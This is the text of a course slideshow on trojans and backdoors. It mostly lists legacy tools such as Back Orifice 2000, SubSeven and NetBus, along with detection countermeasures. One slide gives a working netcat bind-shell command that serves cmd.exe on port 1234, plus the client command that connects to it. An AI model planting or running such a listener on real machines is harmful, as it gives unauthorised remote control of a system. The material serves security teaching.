180 likes | 363 Vues
Week 6: Trojans and Backdoors. What is a Trojan Horse? Overt and Covert. Week 6: Trojans and Backdoors. Hacking Tool: QAZ Hacking Tool: Tini Hacking Tool: Netcat. Netcat in Action as Backdoor. Remote command prompt anyone?
E N D
Week 6: Trojans and Backdoors • What is a Trojan Horse? • Overt and Covert
Week 6: Trojans and Backdoors • Hacking Tool: QAZ • Hacking Tool: Tini • Hacking Tool: Netcat
Netcat in Action as Backdoor • Remote command prompt anyone? • On a Windows NT server issue the following command in the directory that contains netcat: nc -l -p1234 -d -e cmd.exe –L • This –l puts netcat into listen mode, the -p1234 tells netcat to use port 1234, the –d allows netcat to run detached from the console, the –e cmd.exe tells netcat to execute the cmd.exe program when a connection is made, and the –L will restart Netcat with the same command line when the connection is terminated. • On the client system issue the following command: nc destination 1234 • This command causes netcat to connect to the server named destination on port 1234. Immediately you are given a console connection to the destination server. Be careful! To exit the remote console session type: exit • You will be returned to your own console and will be able to reconnect to the destination server because netcat was started on the destination server with the –L option.
Week 6: Trojans and Backdoors • Hacking Tool: Donald Dick • Hacking Tool: SubSeven • Hacking Tool: BackOrifice 2000 • Back Oriffice Plug-ins
Back Orifice 2000 Can be used as a Network Administrator to remotely configure its system. It can also be used as a Trojan/Backdoor by attackers. Can run on any filename, Uses TCP port 54320 and UDP 54321 by default but can use any other port. Can disguise itself as Explorer.exe. Can use Strong Encryption. Open Source. Countermeasure:BackOfficer Friendly (nfr.net/products/bof)
Some BO2K Plugins • BOPeep- provides streaming video of the victim’s screen to attacker. • Encryption- Blowfish, CAST-256, IDEA, RC6 (stronger than most commercial systems) • BOSOCK32- Stealth capabilities using ICMP • STCPIO- stealth using encrypted flow between BO2K GUI and server.
Week 6: Trojans and Backdoors • Hacking Tool: NetBus • Wrappers
Week 6: Trojans and Backdoors • Hacking Tool: Graffiti • Hacking Tool: Silk Rope 2000 • Hacking Tool: EliteWrap • Hacking Tool: IconPlus
Week 6: Trojans and Backdoors • Packaging Tool: Microsoft WordPad • Hacking Tool: Whack a Mole
Week 6: Trojans and Backdoors • Trojan Construction Kit • BoSniffer • Hacking Tool: FireKiller 2000
Week 6: Trojans and Backdoors • Covert Channels • ICMP Tunneling • Hacking Tool: Loki
Week 6: Trojans and Backdoors • Reverse WWW Shell • Backdoor Countermeasures
Week 6: Trojans and Backdoors • BO Startup and Registry Entries • NetBus Startup and Registry Keys
Week 6: Trojans and Backdoors • Port Monitoring Tools • fPort (foundstone.com) • TCPView (http://www.sysinternals.com/ntw2k/source/tcpview.shtml) • Process Viewer
Week 6: Trojans and Backdoors • Inzider - Tracks Processes and Ports (www.sans.org/y2k/finding.htm ) • Trojan Maker
Week 6: Trojans and Backdoors • Hacking Tool: Hard Disk Killer • Man-in-the-Middle Attack • Hacking Tool: dsniff
Week 6: Trojans and Backdoors • System File Verification • TripWire (tripwire.com, tripwire.org)
Week 6: Trojans and Backdoors • Summary